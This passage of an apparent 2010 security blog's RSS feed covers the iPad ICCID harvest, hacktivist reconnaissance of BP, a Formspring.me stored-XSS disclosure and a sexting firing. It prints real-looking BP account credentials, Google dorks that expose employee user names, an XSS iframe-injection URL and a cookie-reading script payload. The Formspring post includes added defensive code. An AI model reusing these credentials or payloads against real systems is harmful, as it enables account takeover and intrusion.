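        lookups[ip].append(iccid)
        agents[ip].add(ua)
    findings = {}
    for ip, seen in lookups.items():
        distinct = list(dict.fromkeys(seen))              # request order, repeats dropped
        if len(distinct) < min_lookups:
            continue
        pairs = list(zip(distinct, distinct[1:]))
        if not all(int(b) > int(a) for a, b in pairs):
            continue                                      # scattered lookups, not a sweep
        findings[ip] = {
            "lookups": len(distinct),
            "first": distinct[0],
            "last": distinct[-1],
            "luhn_valid": sum(luhn_valid(x) for x in distinct),
            # the post's script does $ICCIDroot++ and regenerates the check digit, so the
            # bases (everything but the last digit) step by exactly one between requests
            "consecutive_bases": all(int(b[:-1]) - int(a[:-1]) == 1 for a, b in pairs),
            "user_agents": sorted(agents[ip]),
        }
    return findings


def _log_line(ip, ua, target, ts="10/Jun/2010:01:02:03 +0000"):
    """Build one constructed combined-format line."""
    return f'{ip} - - [{ts}] "GET {target} HTTP/1.1" 200 1432 "-" "{ua}"'


IPAD_UA = "Mozilla/5.0 (iPad)"            # the User-Agent the post's script spoofs
SWEEP_BASE = 890141042120000000           # constructed 18-digit base, stepped by one per request
SAMPLE_LOG = [
    _log_line("203.0.113.7", IPAD_UA, f"{LOOKUP_PATH}?ICCID={b}{luhn_check_digit(str(b))}&IMEI=0")
    for b in range(SWEEP_BASE, SWEEP_BASE + 6)
] + [
    # one genuine-looking activation: a single lookup, then the follow-on Customer page
    _log_line("198.51.100.2", IPAD_UA, f"{LOOKUP_PATH}?ICCID={SWEEP_BASE + 40}{luhn_check_digit(str(SWEEP_BASE + 40))}&IMEI=0"),
    _log_line("198.51.100.2", IPAD_UA, "/OEPClient/Customer"),
    "not a log line at all",
]

if __name__ == "__main__":
    for ip, summary in detect_enumeration(SAMPLE_LOG).items():
        print(ip, summary)
```

<p>Run as a script it prints one line per flagged client; min_lookups is the only knob. The check is reactive, though: binding the lookup to an authenticated session and rate-limiting it per client is what would have stopped the harvest rather than merely logged it.</p>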

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/12/shodan-cracking-ip-surveillance-dvr/">SHODAN: Cracking IP Surveillance DVR</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/youve-been-shodand/">You&#8217;ve been SHODAN&#8217;d</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>Going After BP</title>
		<link>http://praetorianprefect.com/archives/2010/06/going-after-bp/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/going-after-bp/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 20:43:09 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[brute forcing]]></category>
		<category><![CDATA[hacktivism]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[vpn]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4050</guid>
		<description><![CDATA[BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP's recent public relations activities in the online arena.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-150x150.jpg" alt="" title="bp" width="150" height="150" class="alignleft size-thumbnail wp-image-4055" /></a></p>

<p>BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP&#8217;s recent public relations activities in the online arena. Specifically, reactions to BP&#8217;s having bought the sponsored link for the search term &#8216;oil spill&#8217; seem to have triggered resentment in the form of reconnaissance work, a Twitter account compromise, and an amusing cross site scripting vulnerability.</p>

<p>In the Reddit case, the method shown and gotchas demonstrated are worth covering, although no actual hack takes place. The XSS demonstrated at the bottom of the post is just creative and funny.</p>

<h3>Twitter</h3>

<p>As widely reported, on May 27th, BP&#8217;s official Twitter account was compromised and the following tweet put up.</p>

<div id="attachment_4062" class="wp-caption alignnone" style="width: 558px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-twitter-hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp-twitter-hacked.jpg" alt="" title="bp-twitter-hacked" width="548" height="417" class="size-full wp-image-4062" /></a><p class="wp-caption-text">Pick a stronger password.</p></div>

<p>And while it&#8217;s not a hack, the spoof Twitter account <a href="http://www.twitter.com/BPGlobalPR">BPGlobalPR</a> has garnered some attention (150k followers) as a satirical response to BP&#8217;s actual public relations response. It has gotten enough attention that the real BP has made overtures to the fake account to <a href="http://newsfeed.time.com/2010/06/09/bp-gets-bpglobalpr-to-clean-up-its-twitter/">better identify itself as a parody</a>.</p>

<h3>Reddit</h3>

<p>Last night on Reddit a user skipperdee responded to a post about the BP sponsored link <a href="http://www.reddit.com/r/politics/comments/ccuc1/if_bp_wants_to_waste_their_money_buying_key_words/">as follows</a>:</p>

<div id="attachment_4059" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/h08EB2.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/h08EB2.png" alt="" title="h08EB" width="750" height="526" class="size-full wp-image-4059" /></a><p class="wp-caption-text">Reconnaissance</p></div>

<p>Let&#8217;s walk through his suggestions:</p>

<h4>VPN Login Screen</h4>

<p>Looking at what&#8217;s here, he found what is ostensibly a VPN login screen for some extranet type applications: https://access.bpglobal.com/bp/C/login.html?_targetURL=https://access.bpglobal.com/pkmslogin.form (with what looks like an open redirect).</p>

<p>One downtick for information security: it offers either certificate-based authentication or, alternatively, login with a plain ID and password.</p>

<div id="attachment_4056" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/IDAM_login.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/IDAM_login.jpg" alt="" title="IDAM_login" width="750" height="360" class="size-full wp-image-4056" /></a><p class="wp-caption-text">https://access.bpglobal.com/help/bpcertExpired.html</p></div>

<p>A review of this screen (above), however, suggests that the user&#8217;s Windows login (Active Directory) is the same as their IDAM login, since it refers to an &#8220;NT ID and password&#8221;.</p>

<h4>User Names</h4>

<p>Our Reddit user goes on to show off a little Google hacking by demonstrating how to find out the user names of BP employees:</p>

<p><a href="http://www.google.com/#hl=en&amp;q=%22Documents+And+Settings%22+site%3Abp.com&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=&amp;fp=dfdf66882bd03aae">http://www.google.com/#hl=en&amp;q=%22Documents+And+Settings%22+site%3Abp.com&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=&amp;fp=dfdf66882bd03aae</a>.</p>

<div id="attachment_4067" class="wp-caption alignnone" style="width: 646px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_mydocs.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_mydocs.jpg" alt="" title="bp_mydocs" width="636" height="111" class="size-full wp-image-4067" /></a><p class="wp-caption-text">Username equals Warna3.</p></div>

<p>Because a number of BP employees use the built-in MS Word footer option for file name and path, their user names have been exposed in publicly released documents. Once a number of user names can be enumerated, an attacker with a brute force password cracker is off to the races.</p>

<h4>Documents</h4>

<p>He then goes on to demonstrate that publicly available sites have a sub-directory /STAGING which appears to show semi-public documents (releases to the press, investor releases, etc.).</p>

<p><a href="http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&amp;hl=en&amp;start=0&amp;sa=N&amp;fp=dfdf66882bd03aae">http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&amp;hl=en&amp;start=0&amp;sa=N&amp;fp=dfdf66882bd03aae</a></p>

<p>It&#8217;s unclear that anything unusual is publicly exposed here. One document is marked official use only which shows the oil spill projections, however that&#8217;s a lot like saying something is under copyright but still releasable. Another is marked &#8220;Project Confidential&#8221; but it&#8217;s unclear if it left that classification when added to the /STAGING site.</p>

<div id="attachment_4086" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_situationmap.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_situationmap.jpg" alt="" title="bp_situationmap" width="750" height="579" class="size-full wp-image-4086" /></a><p class="wp-caption-text">Situation Map.</p></div>

<p>Like a lot of large companies, there&#8217;s probably more online than should be, but it doesn&#8217;t appear /STAGING has any special significance as an intranet type site. I will confess, this is my favorite document, <a href="http://docs.google.com/viewer?a=v&amp;q=cache:O4zm5Oi8orsJ:www.bp.com/liveassets/bp_internet/globalbp/STAGING/global_assets/downloads/H/horizon_magazine_issue_2_april_2008.pdf+site:bp.com+inurl:staging+%222010%22+confidential&amp;hl=en&amp;gl=us&amp;pid=bl&amp;srcid=ADGEESj2qEnWcCOF8SWSE5Ikgv1JZDNi2DCJMt93uwf0BsHNct0gjaJcG0ymZucQ0kPIP5GbvWPemQ_7Y2Ddb76Ibx9-SU2hJfKB2wxvy-IXZAEhzJXqhWSKavmJCLcSAvBPxlUSw5EL&amp;sig=AHIEtbSyg7hGwgwf5flxBZmau3Amuc-x_A">the April 2008 company magazine</a>:</p>

<div id="attachment_4087" class="wp-caption alignnone" style="width: 495px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_horizon.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_horizon.jpg" alt="" title="bp_horizon" width="485" height="649" class="size-full wp-image-4087" /></a><p class="wp-caption-text">BP Horizon: The Battle to Secure Company Data.</p></div>

<h4>Some Passwords</h4>

<p>There are two old passwords in two of the files, a form and a newsletter. Both are for ibackup.com access, which like other document sharing sites has a public folder concept. Given their age, there probably isn&#8217;t much of an issue here; however, password re-use inside organizations is quite common.</p>

<p>ID: bproadmap<br />
PW: safety<br />
<a href="http://www.bp.com/liveassets/bp_internet/bp_canada_noel/bp_canada_noel_english/STAGING/local_assets/downloads_pdfs/j/journey_hazard_assessment_card_2009_02_18.pdf">journey_hazard_assessment_card_2009_02_18.pdf</a></p>

<p>ID: bpshipping02<br /> 
PW: flag01<br />
<a href="http://docs.google.com/viewer?a=v&amp;q=cache:6nzmWJJpB3kJ:www.bp.com/liveassets/bp_internet/bp_shipping/bp_shipping_english/STAGING/local_assets/downloads_pdfs/f/Flag_29_May_2008.pdf+site:bp.com+inurl:staging+password&amp;hl=en&amp;gl=us&amp;pid=bl&amp;srcid=ADGEESieFMPdmCO_hNW2MSA4pu7K_bGkmXjhna1KtQNEWiMcdfmOrm658QSkwKVIfO5rFFkOWkFPe8kq9ZssmL_XQ8K4Hdbkm409NGT_A0c0yVynORfFiqQLXNNTgaArMHygEpG9KCix&amp;sig=AHIEtbT7TxhK88zxrqpdVTepx1Z8nH_lhA">Flag_29_May_2008.pdf</a></p>

<p>In the case of the second id, it certainly looks to be the kind of id and password that gets incremented for different things (bpshipping01, bpshipping03, flag02).</p>

<h3>PHP File Include and XSS</h3>

<p>Finally, the Reddit commenter points out the energiser.bp.com URL as one that appears to be a web application with a few issues, including potentially a PHP remote file include or arbitrary file access:</p>

<p>http://energiser.bp.com/help.php?module=moodle&amp;file=insert file here</p>

<p>The site appears to use Moodle, a popular CMS platform, thus something else that can be looked at. However <a href="http://www.xssed.com/mirror/67152/">holisticinfosec got there first</a> and best with an XSS based iFrame injection:</p>

<pre><code>http://energiser.bp.com/login/index.php?lang=%22%3E%3Ciframe%20src=http://www.tampabay.com/multimedi
a/archive/00121/SP_322824_BORC_oilp_121445c.jpg%20width=450%20height=300%20frameborder=0%20scroll=no
%3E%3C/%3E%3C/;document.write%28unescape%28a.source%29%29;{//
</code></pre>

<div id="attachment_4071" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_xss1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_xss1.jpg" alt="" title="bp_xss" width="750" height="707" class="size-full wp-image-4071" /></a><p class="wp-caption-text">iFrame inclusion on a bp.com site.</p></div>

<h3>Finally</h3>

<p>Is most of this nonsense from a hard core security standpoint? Yes, to an extent. The XSS ought to be corrected, and two-factor authentication on VPNs is kind of a must-have at this point.</p>

<p>Does BP need a security audit of their perimeter, web properties, online services used, and security policies? Also yes. Maybe schedule it after they plug that gushing oil geyser this August.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/">Newsweek Reports Zombie Invasion</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/">Congressional Web Site Defacements Follow the State of the Union</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/umm-techcrunch-defacement-two-in-24-hours/">Umm&#8230;TechCrunch? Defacement Two in 24 Hours</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/techcrunched-techcrunch-the-victim-of-a-defacement/">TechCrunched &#8211; TechCrunch the Victim of a Defacement</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/baidu-com-the-latest-victim-of-iranian-cyberarmy/">Baidu.com the Latest Victim of Iranian CyberArmy</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/going-after-bp/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Formspring.me XSS Vulnerability</title>
		<link>http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/#comments</comments>
		<pubDate>Fri, 04 Jun 2010 02:46:32 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Social Networking]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3922</guid>
		<description><![CDATA[Formspring.me, a newly popular social networking site, has a fundamental cross site scripting flaw that allows one logged in user to steal another user’s session, but also may allow users to find out who posted a nasty comment about them.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring.gif" alt="" title="formspring" width="136" height="120" class="alignleft size-full wp-image-3925" /></a></p>

<p>Formspring.me, a newly popular social networking site, has a fundamental cross site scripting flaw that allows one logged in user to steal another user&#8217;s session, but also may allow users to find out who posted a nasty comment about them. A key complaint about the site is that you can not find out the identity of an anonymous user.</p>

<p><i>Update</i>: Kudos to Formspring.me, even though it was hard to initially report the problem, they corrected it in about an hour from opening a post on their technical support forum, a nice turnaround by any standard.</p>

<h3>Formspring.me</h3>

<p>Formspring.me is a six-month-old social networking question and answer site. The web site has come under scrutiny following a few recent news stories involving incidents with teenagers, the site&#8217;s primary demographic. The first notable incident was where <a href="http://www.whtm.com/news/stories/0210/707982.html">a fight broke out</a> over comments on the site. More notable, however, is the story of Alexis Pilkington, a 17-year-old West Islip, NY high school graduate who <a href="http://www.newsday.com/long-island/suffolk/after-teen-s-death-3-800-pledge-web-site-boycott-1.1829354">committed suicide after dozens of insulting comments</a> had been made to her on the site.</p>

<p>From comments on the site, these are not isolated incidents, and it&#8217;s fairly clear Formspring needs to come up with a better model:</p>

<p><i>Is it possible for you to delete an account for harassment if the posts were anonymously posted? I received 18 threats last night that I followed up with a police report to my local PD. I have the police report number, as of yet I have not deleted my account so that if you needed to access it to see the post you could. Please advise.</i></p>

<p><i>I need to know how to go about finding out who sent a message to my daughter&#8217;s account. The message says.. that she would be better off dead.</i></p>

<p><i>I would appreciate it if Formspring will work with our local Santa Barbara Police Department and the Santa Barbara Sheriff Department to find the person that was impersonating my daughter.</i></p>

<p>Such problems have led to various organized boycotts, letters home from school officials, and coverage under the topic of cyber-bullying in a number of news outlets.</p>

<h3>The Big Issue People Have</h3>

<p>One of the primary complaints about the web site is the anonymity of questioners. Hiding behind the veil of anonymity has allowed users, mostly teenagers, to make nasty remarks to each other that they would probably not make under their own names (although frankly the Internet is a wild place). Largely as a result of this, a good deal of time has been spent trying to figure out a way to determine &#8220;who said that about me?&#8221;, at least according to the articles <a href="http://www.northjersey.com/news/95486479_Anonymous_cyber-taunts_leave_lasting_wounds_on_kids.html">I&#8217;ve been reading</a>. Formspring won&#8217;t help you with anonymous questions, as it states in <a href="http://formspringme.zendesk.com/entries/93852-can-you-tell-me-who-asked-me-an-anonymous-question">their support forums</a>.</p>

<p>But here&#8217;s an answer to that question, or at least a method: a way to grab another user&#8217;s session knowing only their user name, because of a vulnerability present in the Formspring web site.</p>

<ol>
<li><p>We have two users: Tester21 and Tester25. Since they have such close names, they&#8217;ve decided to follow each other using the site&#8217;s People->Find People and Follow functions.</p></li>
<li><p>Tester25 goes to www.formspring.me and asks Tester21 a question:</p>
<div id="attachment_3927" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring_1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring_1.gif" alt="" title="formspring_1" width="700" height="561" class="size-full wp-image-3927" /></a><p class="wp-caption-text">Ask another user a question.</p></div></li>
<li>But that&#8217;s kind of boring, so Tester25 asks a better question: </li>
</ol>

<pre><code>&lt;script&gt;alert(document.cookie);&lt;/script&gt;
</code></pre>

<p>4.  Tester21 logs in and sees he has a question:</p>
<div id="attachment_3928" class="wp-caption alignnone" style="width: 636px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring2.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring2.gif" alt="" title="formspring2" width="626" height="409" class="size-full wp-image-3928" /></a><p class="wp-caption-text">Malicious script, dutifully encoded by Formspring.me.</p></div>
<p>Immediately he sees that this isn&#8217;t a question. Formspring has done a good job for him: rather than allow this malicious script to execute, it has encoded parts of the output, as shown:</p>

<pre><code>&lt;a href="#" rel="question"&gt;
&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;/a&gt;
&lt;span class="askedBy"&gt;asked by &lt;a href="http://www.formspring.me/tester25" rel="profile"&gt;tester25&lt;/a&gt;
</code></pre>

<p>5.  Glad Formspring has protected him from revealing his session cookie by properly encoding output, Tester21 makes a note to drop that loser Tester25 from his Follow list and clicks Home:</p>

<div id="attachment_3929" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring3.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/formspring3.gif" alt="" title="formspring3" width="750" height="595" class="size-full wp-image-3929" /></a><p class="wp-caption-text">The home screen preview executes the Javascript.</p></div>

<h3>What Happened?</h3>

<p>A preview function on the home page shows the user the last pending question they&#8217;ve received. If it&#8217;s the one containing the cross site scripting string, the script executes. In this case it&#8217;s only the classic alert box demonstration, but anything that can be accomplished with JavaScript is possible.</p>

<h3>Another Random Issue</h3>

<p>It appears formspring.me actually logs users in as someone else sometimes without any interaction, as evidenced by <a href="http://formspringme.zendesk.com/entries/187720-logging-into-other-peoples-pages">this user complaint</a>:</p>

<p><i>Hi, every time I want to go to my home page or feeds on my friends answered questions, I keep going to random people&#8217;s homepage or their feeds, any way I can fix this?</i></p>

<h3>Why is Disclosure this Difficult?</h3>

<p>After numerous attempts to sign up for the Support section of the site so we could notify Formspring of this defect, we finally just posted an issue in their Technical Support forum as the notification. They need to think about adding a screen or e-mail address for reporting security issues, &#224; la Twitter and other sites.</p>

<h3>Finally</h3>

<p>So assuming someone is acting as an anonymous user but has given more information in their profile (e-mail, etc.), the person who wants to know who they are could send them a variation of the &#8220;poison question&#8221; above that steals that user&#8217;s session. Most likely this would involve sending the user&#8217;s cookies to another web site, where a script grabs the cookies, logs in as that user and changes the user&#8217;s password, which essentially takes over the account. From taking over the account the attacker gains access to any information filled out in the profile (which could be nothing if Anonymous uses dummy information and an anonymous e-mail) and can post and answer questions as that user.</p>
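<p>The &#8220;What Happened?&#8221; section and the session-stealing scenario above come down to two controls, shown here in an added Python example that is not Formspring.me&#8217;s code (which is not public): encode user text in one shared helper on every output path, the question page and the home-page preview alike, and flag the session cookie HttpOnly so that even a script that does run cannot read it from document.cookie. The vulnerable preview is kept beside the hardened one for contrast. The Question record, the function names and the cookie name are constructed; the markup mirrors the encoded snippet shown above.</p>

```python
"""One escaping helper for every view, plus an HttpOnly session cookie.

Added example, not Formspring.me's code (which is not public).  The post shows the
question page encoding the stored text (the script tag arrives as &lt;script&gt;)
while the home-page preview printed the same text raw, so the script ran there.
Escaping belongs in the rendering layer, applied on every path that emits
user-controlled text, with the encoding chosen for the output context (HTML body,
attribute, URL path).  A session cookie flagged HttpOnly limits what an injection
that does slip through can reach.  Names and the cookie name are constructed.
"""
from dataclasses import dataclass
from html import escape
from http.cookies import SimpleCookie
from urllib.parse import quote


@dataclass
class Question:
    text: str          # untrusted: typed by whoever asked, possibly anonymously
    asked_by: str      # untrusted too: a user name is still user-controlled input


def profile_link(username: str) -> str:
    """Build the 'asked by' anchor: URL-encode the path segment, then HTML-encode the attribute and body."""
    href = "http://www.formspring.me/" + quote(username, safe="")
    return f'<a href="{escape(href, quote=True)}" rel="profile">{escape(username)}</a>'


def render_question_page(q: Question) -> str:
    """The view the post shows working correctly: the question text is HTML-encoded."""
    return (f'<a href="#" rel="question">{escape(q.text)}</a>\n'
            f'<span class="askedBy">asked by {profile_link(q.asked_by)}</span>')


def render_home_preview_vulnerable(q: Question) -> str:
    """The failure mode from the post: a second view that interpolates the raw text."""
    return f'<div class="preview">{q.text}</div>'


def render_home_preview(q: Question) -> str:
    """Hardened preview: same helper, same encoding, so the script tag is inert here too."""
    return f'<div class="preview">{escape(q.text)}</div>'


def session_cookie_header(token: str) -> str:
    """Set-Cookie line for the session: HttpOnly keeps it out of document.cookie,
    Secure keeps it off plaintext HTTP."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["path"] = "/"
    return c.output(header="Set-Cookie:")


if __name__ == "__main__":
    poison = Question("<script>alert(document.cookie);</script>", "tester25")
    print(render_question_page(poison))             # encoded, as the post's snippet shows
    print(render_home_preview_vulnerable(poison))   # raw script tag: this is the bug
    print(render_home_preview(poison))              # encoded: inert
    print(session_cookie_header("constructed-session-token"))
```

<p>Escaping in the template layer rather than at input time is the point: the same stored text reaches every view, so every view must encode it for its own context, and a user name that ends up in an href needs URL encoding before the attribute encoding, as profile_link does.</p>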

<p>Additionally by searching out people making use of the Formspring widget, you don&#8217;t even really need to be a Formspring user yourself to post the XSS string to a Formspring user&#8217;s account.</p>

<p>The problem above is magnified in that many users connect their Formspring accounts to Facebook and Twitter (meaning a person who has taken over the account can then post messages to these other two social networking services).</p>

<p>In terms of actual impact, it&#8217;s unclear that users would have any truly sensitive information available in their profiles, making information disclosure a low risk (assuming the user didn&#8217;t post sensitive information themselves). Birthday and e-mail are probably the only two fields that could be considered user confidential. So the primary issue is session hijacking. Is it a big deal? It probably is not; other social networking sites had similar issues in their first six months of existence. It is just something that should be corrected.</p>

<p>As for Formspring itself, and the issues people are having with anonymous users, this is probably worthy of its own blog post. There are a number of sites that allow anonymous comments to be posted, and the web is famous for snarks and nastiness in online comments. That said, having experienced these problems so publicly, and being a web site that is used primarily by young people, Formspring would be best advised to remove the anonymous question capability to avoid libel, cut down on police investigations, and get itself out of the negative press for a while. Call it the price of being popular.</p>

<p>A special thanks to <a href="http://www.twitter.com/ethicalhack3r">ethicalhack3r</a> for bouncing some ideas around.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/">F-Secure XSS on Anti-Theft Website</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/xss-flaw-on-paypal-com/">XSS Flaw on PayPal.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/pentagon-web-pwned/">Pentagon Web Site Vulnerabilities Identified</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Thou Shalt Not Send Naked Pictures&#8230;To Anyone Ever</title>
		<link>http://praetorianprefect.com/archives/2010/05/thou-shalt-not-send-naked-pictures-to-anyone-ever/</link>
		<comments>http://praetorianprefect.com/archives/2010/05/thou-shalt-not-send-naked-pictures-to-anyone-ever/#comments</comments>
		<pubDate>Wed, 26 May 2010 22:27:07 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Stay Safe Online]]></category>
		<category><![CDATA[sexting]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3997</guid>
		<description><![CDATA[It's becoming a familiar story, an angry parent of a student reports finding inappropriate images, self taken naked pictures and videos, on that student's cell phone. But this story has an unusual wrinkle: the student is a 20 year-old at the University of Central Florida, the girlfriend of 32 year-old Mandarin High School football coach Jason Robinson.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/MandarinHigh.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/MandarinHigh-150x150.jpg" alt="" title="MandarinHigh" width="150" height="150" class="alignleft size-thumbnail wp-image-3998" /></a></p>

<p>It&#8217;s becoming a familiar story: an angry parent of a student reports finding inappropriate images, self-taken naked pictures and videos, on that student&#8217;s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20-year-old at the University of Central Florida, the girlfriend of 32-year-old Mandarin High School football coach Jason Robinson.</p>

<p>Upon finding the pictures, the mother of Jason Robinson&#8217;s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an &#8220;at-will&#8221; employee.</p>

<p>The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:</p>

<pre><code>"Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are 
not to come back onto our campus, and we will make arrangements to get any of your personal 
belongings to you. 

You are also being non-reappointed for the next school year. It is regretful it had to come to this, 
but I believe you understand the situation."

"We hold our teachers to a higher standard. They are in front of our students. They're talking 
with our students. They're teaching our students how to become good characters"
</code></pre>

<div id="attachment_4004" class="wp-caption alignleft" style="width: 368px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/jasonrobinson.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/jasonrobinson.jpg" alt="" title="jasonrobinson" width="358" height="304" class="size-full wp-image-4004" /></a><p class="wp-caption-text">Jason Robinson</p></div>

<p>So we are left with an &#8216;at will&#8217; employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn&#8217;t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.</p>

<p>The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private, non-criminal, non-disallowed by policy, actions of two consenting adults, they open themselves up in an inappropriate role as a moral arbiter over their teachers and staff. The mother&#8217;s actions were largely inappropriate in the absence of a crime or high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can&#8217;t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.</p>

<p>Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20-year-old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects of working as a high school football coach to be so publicly dismissed.</p>

<p>A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.</p>

<h3>One Wrinkle Though</h3>

<p><div id="attachment_4022" class="wp-caption alignright" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/1274916964-richardson1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/1274916964-richardson1-150x150.jpg" alt="" title="1274916964-richardson" width="150" height="150" class="size-thumbnail wp-image-4022" /></a><p class="wp-caption-text">Dr. Donna Richardson</p></div><br /></p>

<p>There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn&#8217;t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and &#8216;shaming&#8217; e-mail).</p>

<p>So why isn&#8217;t that being included in the school&#8217;s response to the case? Either because it isn&#8217;t true, or because they haven&#8217;t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principal&#8217;s computer.</p>

<p>According to most followup commentary, the &#8220;sent from a school computer&#8221; piece likely is not true anyway.</p>

<h3>Sexting</h3>

<p>Sexting is basically the act of sending a sexually explicit photograph or message using a mobile phone as the communication device. The name derives from a combination (or portmanteau, for those who want to learn a new word) of the words sex and texting.</p>

<p>The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.</p>

<p>The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.</p>

